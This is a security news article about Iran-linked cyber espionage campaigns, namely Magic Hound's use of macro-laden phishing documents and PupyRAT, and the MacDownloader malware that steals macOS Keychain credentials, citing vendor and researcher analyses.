Security experts and intelligence agencies are observing a significant intensification of the cyber espionage campaigns linked to Iran-based hackers.
A few days ago, security researchers at Palo Alto Networks had uncovered a new cyber espionagecampaign linked to Iran that targeted several organizations in the Middle East. Threat actors hit numerous organizations in the energy, government, and technology industries, all the victims are located or have an interest in Saudi Arabia.
The hacking campaign was dubbed Magic Hound , and according to the analysts, it dates back at least mid-2016.
It is interesting to note that hackers behind the Magic Hound campaign used a wide range of custom tools and an open-source, cross-platform remote access tool (RAT) dubbed Pupy.
“According to the developer, PupyRAT is a “multi-platform (windows, linux, OSX, Android), multi-function RAT and post-exploitation tool mainly written in python.” CTU analysis confirms that PupyRAT can give the threat actor full access to the victim’s system.” reads the analysis published by SecureWorks.
The hackers’ arsenal includes different families of custom tools, including droppers, downloaders, executable loaders, document loaders and IRC bots.
“Unit 42 has discovered a persistent attack campaign operating primarily in the Middle East dating back to at least mid-2016 which we have named Magic Hound. This appears to be an attack campaign focused on espionage. Based upon our visibility it has primarily targeted organizations in the energy, government, and technology sectors that are eitherin inor business interests in Saudi Arabia.” reads the analysis published by PaloAlto Networks.“Link analysis of infrastructure and tools also revealed a potential relationship between Magic Hound and the adversary group called “ Rocket Kitten ” (AKA Operation Saffron Rose , Ajax Security Team , Operation Woolen-Goldfish ) as well as an older attack campaign called Newscasters.”
Experts at SecureWorks are also monitoring the activity of the Iranian threat actor; they linked the attacker to a nation-state group of hackers tracked as COBALT GYPSY that is associated with the Government of Teheran.
The technique used by hackers is not sophisticated; hackers used spear-phishing messages with Word and Excel documents embedding malicious macros. When the victims open the document and enable the macro, a malicious payload is downloaded and executed.
“The downloaded document attempts to run a macro that then runs a PowerShell command. This command downloads two additional PowerShell scripts that install PupyRAT , an open-source remote access trojan (RAT),” reads the analysis published by SecureWorks.
The malicious documents used in the attacks appear to be holiday greeting cards, job offers, and official government documents from the Ministry of Health and the Ministry of Commerce in Saudi Arabia.
Figure 1 Malicious documents used in the Magic Hound Campaign (SecureWorks)
In January 2017, a cyber espionage group linked to the Iranian Government has been using an unsophisticated strain of malware, dubbed MacDownloader , to steal credentials and other data from Mac computers.
The malicious code was discovered and analyzed by the malware researchersClaudio Guarnieri and Collin Anderson. The security duo discovered that the malicious code wasdisguisedby nation-state hackers as a Flash Player update and a Bitdefender Adware Removal Tool.
The attacks observed by the researchers mostly targeted the defense industrial base sector, but the same threat actors also used the same malware in a targeted attack against a human rights advocate.
The malicious code does not appear to be sophisticated, according to the security duo it was “poorly” developedthe end of 2016 and its code was copied from other sources.
The problem is that even if the code is very simple, at the time of writing the analysis, MacDownload was undetected by virus scanning engines on VirusTotal. More than a month later, less than half of the vendors was able to detect the bogus Flash Player and Bitdefender apps as a threat.
Once theMacDownloaderinfects a device, the malware collects information about the host, including passwords stored in the Keychain.
“MacDownloader seems to be poorly developed and created towards the end of 2016, potentiallya firstattempt from an amateur developer. In multiple cases, the code used has been copied from elsewhere. The simple activity of downloading the remote file appears to have been sourced from a cheat sheet. The main purpose of MacDownloader seems to be to perform an initial profiling of the infected system and collection of credentials from macOS’s Keychain password manager which mirrors the focus of Windows malware developed by the same actors.” reads the analysis published by the security duo.
The experts discovered a first sample of the malware on a fake website of the aerospace firm United Technologies Corporation, that is the same website that was used in the past to spread aWindows malware and the Browser Exploitation Framework (BeEF).The malware researcherslinked the MacDownloader with the activity of an Iranian threat actor knownasCharming Kitten (aka Newscaster and NewsBeef).
The Newscaster hacker group made the headlines in 2014when experts atiSightissued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media.